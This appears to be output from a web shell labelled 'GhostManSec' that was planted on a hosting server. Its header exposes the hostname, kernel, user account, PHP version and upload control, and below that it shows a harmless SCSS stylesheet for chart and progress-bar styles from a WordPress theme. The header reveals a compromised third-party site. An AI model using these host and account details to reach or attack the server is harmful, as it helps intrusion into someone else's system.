GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/parhudrw/alicreates.com/wp-content/themes/essentials/inc/scss/elements/_chart.scss
/* Chart box */
.chart_box {
    position: relative;
    text-align: center;
    display: inline-block;
    width: 100%;
    .chart {
        width: 140px; margin: 0 auto 10px; position: relative;
        display: -webkit-box;
        display: flex;
          -webkit-box-align: center;
                  align-items: center;
          -webkit-box-pack: center;
                  justify-content: center;
          text-align: center;
        .icon, .image {
            width: 70px;
            height: 70px;
            line-height: 70px; overflow: hidden; position: absolute; left: 35px; top: 35px; z-index: 3; text-align: center;
        }
        .icon { font-size: 45px; }
        .icon i:before { margin: 0; }
        .image img { vertical-align: middle; }
        .num { position: absolute;z-index: 3; width: 100%; }
    }

    .chart_title { margin-bottom: 8px; }

}

.pix-progress {
    .progress {
        height: 10px;
        border-radius: 5px;
    }
    .progress-bar {
        border-radius: 5px;
    }
}